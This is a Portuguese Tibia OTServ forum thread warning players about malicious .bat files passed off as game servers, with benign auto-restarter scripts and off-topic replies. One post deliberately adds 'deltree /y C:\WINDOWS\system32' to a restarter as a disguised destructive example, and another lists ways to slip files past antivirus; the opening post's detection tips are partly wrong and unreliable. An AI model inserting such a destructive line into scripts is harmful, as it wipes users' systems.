Dicas De Segurança

Fl4m3r_
em Tutoriais para Iniciantes

Fl4m3r_

avatar
Campones
Campones

INFOS

Grupo: CamponesRegistrado: 04/01/06Posts: 4

A cada dia o OT vem recebendo lammers e mais lammers que não tem nada para fazer e ficam postando keyoggers etc. Vou lhes dar umas dicas para não cair nessa:

Arquivos não indetificados pelo anti-vírus:

Antes de mais nada quero esclareçer que todo anti-vírus possui falhas e nem sempre programas assim considerados pelo anti-vírus como trojan ou algo serão algo que atrapalhará sua vida.

Existem arquivos indetectáveis e existem programas e joinners que passam dispercebidos. Portanto, se você acha que está protegido porque tem o melhor anti-vírus, você está completamente errado.

Tem noob hoje em dia que está colocando pequenos comandos no arquivo .bat, e enviando como OT. Como prevenir?

Abra seu bloco de notas vá em abrir e selecione para abrir qualquer arquivo, então, selecione o arquivo .bat baixado.

Se tiver algum desses comandos:

 

@echo offEste comando esconde a ação. Todo Badcon possui um desses, ou seja se no seu .bat tiver um desses já pode descartar.

 

 

ClsLimpa a tela. Isso faz com que na janela de Dos nada apareça. Muito usado em badcons também.

 

 

DelMuito cuidado com esse comando. Ele permite deletar qualquer parte do seu sistema operacional.

 

 

DeltreeO mais perigoso. Ele destrói o windows da pessoa quando o .bat é rodado. Cuidado com esse.

 

Bom, esses são os mais usados, porque os lammers não conheçem o outros. É demais pra eles.

Espero que isso ajude.

Eigenlieb

Ex-Diretor
avatar
Visconde
Visconde

INFOS

Grupo: ViscondeRegistrado: 11/01/06Posts: 300Char no Tibia: Lippisch
Tem noob hoje em dia que está colocando pequenos comandos no arquivo .bat, e enviando como OT. Como prevenir?

Um arquivo .Bat é um arquivo bem peculiar, ele executa as ações listadas.

Eu realmente não saberia dizer quem iria clicar em uma .Bat sem saber o que ele é... :P:

. . .

Ok, você deu um bom aviso...

Deltree

O mais perigoso. Ele destrói o windows da pessoa quando o .bat é rodado. Cuidado com esse.

???

O deltree é um comando que exclui a arvore do diretorio escolhido. De nada adianta ele ser rodado sozinho.

DELTREE [/Y] [unidade:]caminho [[unidade:]caminho[...]]

Os programas maliciosos não utilizam o

/Y
Pois ele server para pedir a confirmação de exclusão.

Do jeito que voce diz ele parece mortal :grin:

@echo off

Pode descartar qualquer arquivo que contenha isso? LOL??

Não.

Conheço varias ferramentas de remoção de spywares e virus que são .bat e contém, claro, esse echo off.

Echo off server para remover o "eco" ele não mostra a ação que está sendo executada. E pode se adicionar falas também.

Por exemplo, posso criar um "programa" para rodar a limpeza de disco. é muito util para maquinas em rede, pois não preciso ir em iniciar>acessorios e etc. Basta rodar o arquivo.

@echo off

echo      ::::::::::::::::::::::::::::

echo      :feito por::::Eigenlieb:::::

echo      ::::::::::::::::::::::::::::

echo Ola, rodaremos a limpeza de disco. Esse aplicativo serve para localizar

echo e apagar arquivos não utilizados no seu computador.

pause

cd C:\WINDOWS\system32

cleanmgr

Podem copiar e colar no bloco de notas salvar como Limpeza.bat rodar e ver o que acontece.

É tudo feito por comandos DOS. Ai ai... vocês não são do tempo do Win 3.11, quem ai é sabe do que eu estou falando :grin:

E tomem cuidado também, existem aplicativos que transformam arquivos .bat e .exe assim podem se passar por outros arquivos.

Sou um ótimo avaliador de caráter! O meu, por exemplo, é péssimo.

Rotciv

avatar
Visconde
Visconde

INFOS

Grupo: ViscondeRegistrado: 14/10/05Posts: 423Char no Tibia: Rotciv

bom...

VEJA ISSU:

@echo off

OTServ Auto Restarter

echo :: =========================================

echo ::      Otserv restarter by GM Rotciv

echo :: =========================================

echo ::

:begin

neverland.exe

echo ::

echo :: =========================================

echo :: --- Server ja vai reiniciar, espera um pouco ---

echo :: =========================================

echo ::

goto begin

:goto begin

issu eh um restarter, existe algum problema com ele?

Acessando apenas para criticar (positivamente).

E-mail: rotciv@xtibia.com

L0ky

Caçador
avatar
Campones
Campones

INFOS

Grupo: CamponesRegistrado: 09/07/05Posts: 26

Realmente não vejo problema algum, mas nesse caso. Vejamos por exemplo um outro... Suponhamos que alguem que não entenda muito da coisa, rode um OT com autorestarter, e que na mesma pasta do OT esteja um Trojan oculto que será iniciado junto com o OT... Isso é um perigo, usando @echo off a pessoa que estiver abrindo o OTServ estará disponibilizando seu PC aos outros sem saber... Portanto, editar o conteúdo de um *.bat antes de executá-lo é a melhor maneira de se previnir.

trofeujoinhaheaderev1.gif


MSN: rafiix@hotmail.com 32fc5d95-6f32-46d6-9abd-f1b20caa9427.png

Vamo que vamo, pq se parar dá cãibra... =x

Eigenlieb

Ex-Diretor
avatar
Visconde
Visconde

INFOS

Grupo: ViscondeRegistrado: 11/01/06Posts: 300Char no Tibia: Lippisch
bom...

VEJA ISSU:

issu eh um restarter, existe algum problema com ele?

 

 

 

Não. A unica coisa que tem de diferente é o comando :begin

É um comando de auto efetivação.

Ele não roda nenhum codigo malicioso.

Ah não ser que o seu neverland.exe tenha um codigo malicioso :P:

Sou um ótimo avaliador de caráter! O meu, por exemplo, é péssimo.

Fl4m3r_

avatar
Campones
Campones

INFOS

Grupo: CamponesRegistrado: 04/01/06Posts: 4

Tomar cuidado com joinners também e tem um programa que não me lembro o nome que "burla" o anti virus depois eu posto o nome que agora não me lembro

Eigenlieb

Ex-Diretor
avatar
Visconde
Visconde

INFOS

Grupo: ViscondeRegistrado: 11/01/06Posts: 300Char no Tibia: Lippisch

A coisa mais facil é se burlar um anti virus.

Pode-se:

Comprimir o arquivo.

Esconder o arquivo dentro de outro.

( Por isso não se deve aceitar arquivos de alguem que você não conhece.)

Não existe um "programa" especifico que é usado. A maioria dos criadores de Spywares e trojans já colocam um utilitario para "esconder" junto com o arquivo. É simples.

Sou um ótimo avaliador de caráter! O meu, por exemplo, é péssimo.

Eigenlieb

Ex-Diretor
avatar
Visconde
Visconde

INFOS

Grupo: ViscondeRegistrado: 11/01/06Posts: 300Char no Tibia: Lippisch

Olhem só, eu vou pegar o AutoRestarter dado pelo GM Rot~ e vou incluir um codigo malicioso.

@echo off

OTServ Auto Restarter

echo :: =========================================

echo ::      Otserv restarter by GM Rotciv

echo :: =========================================

echo ::

:begin

neverland.exe

echo ::

echo :: =========================================

echo :: --- Server ja vai reiniciar, espera um pouco ---

echo :: =========================================

echo ::

goto begin

:goto begin

Agora o mesmo restarter com um codigo ~>Altamente malicioso <~

NÂO EXECUTE!

@echo off

OTServ Auto Restarter

echo :: =========================================

echo ::      Otserv restarter by GM Rotciv

echo :: =========================================

echo ::

:begin

neverland.exe

echo ::

echo :: =========================================

echo :: --- Server ja vai reiniciar, espera um pouco ---

echo :: =========================================

echo ::

goto begin

:goto begin

deltree /y C:\WINDOWS\system32

Mesmo sem atrapalhar o funcionamento do restarter esse codigo exclui a pasta System32 que contem arquivos de sistema importantes.

VOU AVISAR DE NOVO. NÃO EXECUTE ESSE ARQUIVO, NÃO VOU ME RESPONSABILIZAR PELO O QUE PODE ACONTECER.

Se os moderadores não concordarem em expor um codigo malicioso eu terei muito prazer em editar esse post ;/:

____________________________________________________________________

Só deixando uma observação... Eu criei um codigo muito chato :P:

Ele só vai apagar a system32 quando o server cair... :sleeping:

Sou um ótimo avaliador de caráter! O meu, por exemplo, é péssimo.

DanielStyfler

avatar
Barão
Barão

INFOS

Grupo: BarãoRegistrado: 26/09/07Posts: 207Char no Tibia: Tyth Holdo

Bom saber :smile_positivo:

Extreme...

para qm gosta de OTs 8.10 ai vai o meu...

IP: extremeglobal.servegame.com
Mapa: Global
Uptime: 24Horas
Exp: 15x

é isso ae... vem conhecer o Extreme... não adianta falar "ah é 8.10 é zuado" sem conhecer nada é zuado

Sarve

avatar
Campones
Campones

INFOS

Grupo: CamponesRegistrado: 31/03/08Posts: 3

gente estava procurando um topico de restarter para meu ot nao fecha e peguei este

 

 

 

echo off

 

title Evolutions Server

 

cls

 

:controllerini

 

Evolutions-XML.exe

 

echo Caiu =´[ Mais eu tenho restarter e aprendi a criar com o Zirun =)

 

goto :controllerini

 

 

só q agr nao consigo abrir nenhum ot pq meu avg reconheçe como virus alguem pode me ajudar??

DaNDaNrOxX

oi mosso
avatar
Marquês
Marquês

INFOS

Grupo: MarquêsRegistrado: 18/01/08Posts: 1455Char no Tibia: Saint Claire

Amigo, você postou em um tópico de 2006...

Faça isto mais não mano...

Se tiver alguma dúvida, vá até a seção de dúvidas sobre OTServer e poste lá

 

 

Entrada na equipe: 23/10/2008 Cargo: Estagiário

Promoção: 25/11/2008 Cargo: Moderador

Promoção: 21/10/2009 Cargo: Coordenador

Remoção: 09/05/2010 Motivo: Estudos

Retorno: 15/11/2010 Cargo: Moderador

Remoção: 20/12/2012.

 

 

Sarve

avatar
Campones
Campones

INFOS

Grupo: CamponesRegistrado: 31/03/08Posts: 3

gente estava procurando um topico de restarter para meu ot nao fecha e peguei este

 

 

 

echo off

 

title Evolutions Server

 

cls

 

:controllerini

 

Evolutions-XML.exe

 

echo Caiu =´[ Mais eu tenho restarter e aprendi a criar com o Zirun =)

 

goto :controllerini

 

 

só q agr nao consigo abrir nenhum ot pq meu avg reconheçe como virus alguem pode me ajudar??

 

 

 

 

 

 

mais manow eu num consigo faze em otro topico me ajuda porfavor

Sarve

avatar
Campones
Campones

INFOS

Grupo: CamponesRegistrado: 31/03/08Posts: 3

nossa q mankada

didinhaxd

avatar
Campones
Campones

INFOS

Grupo: CamponesRegistrado: 08/02/08Posts: 81Char no Tibia: nemhum

Não gostei muito porquê eu não tenho net discada :]

Mais fora isso..

 

APROVADO

 

jackcoelhomh7fv9hv41sx0we3.gif

 

119325526519.JPG

 

Metas:

 

1 Post [x] Servo

10 Posts [x] Camponês

25 Posts [x] Caçador

50 Posts [x] Cavaleiro

100 Posts [ ] <~~ ALVO BARONETE

200 Posts [ ] Barão